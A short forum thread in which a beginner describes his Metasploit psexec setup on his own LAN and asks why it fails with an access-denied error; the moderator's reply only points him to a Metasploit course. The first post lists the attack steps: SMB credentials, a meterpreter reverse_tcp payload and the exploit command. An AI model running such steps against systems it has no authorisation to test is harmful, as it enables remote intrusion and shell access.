Results 1 to 2 of 2

Thread: Metasploit Problems

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    1

    Default Metasploit Problems

    Hello. im having problems in metasploit i cant seem to connect to my other computer i got running threw lan. heres wut i got so far i ran in msfconsole

    use windows/smb/psexec
    i set my RHOST targets ip
    i set my LHOST my ip
    i run my payload
    set PAYLOAD windows/meterpreter/reverse_tcp
    i set the SMBUser to the administrators name wich is HANNAH
    i set the SMBPass 123
    rport is 445
    and lport is 445
    the targets port 445 is open cause i checked it with nmap
    and then i ran the command exploit -j -z
    and it comes up with (sever responded with error: STATUS_ACCESS_DENIED) command=117 wordcount=0......
    any ideas on wut i am doing wrong? i have spent countless hours on google trying to find a answer is you can point me in the right direction i would be greatfull. thanks

  2. #2
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: Metasploit Problems

    I suggest you first read on how exploits actually work before you just try to use them, in fact everyone should do this before using metasploit.
    Here try to read this, it's the best Metasploit Class: Metasploit Unleashed By Offensive Security
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

Similar Threads

  1. MetaSploit - Some problems
    By 0megear in forum Beginners Forum
    Replies: 8
    Last Post: 03-29-2011, 11:01 PM
  2. Metasploit Database Problems
    By xtjacob in forum Beginners Forum
    Replies: 2
    Last Post: 06-08-2010, 11:50 AM
  3. Metasploit Oracle Login_brute problems - Windows
    By metasploit_newbie in forum OLD Pentesting
    Replies: 0
    Last Post: 03-29-2010, 12:33 PM
  4. newbie Problems with Metasploit
    By GinoCazino in forum OLD General IT Discussion
    Replies: 2
    Last Post: 06-03-2008, 04:02 PM
  5. A couple of metasploit problems. Help me fix this?
    By Fishbones in forum OLD General IT Discussion
    Replies: 7
    Last Post: 01-22-2008, 09:29 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •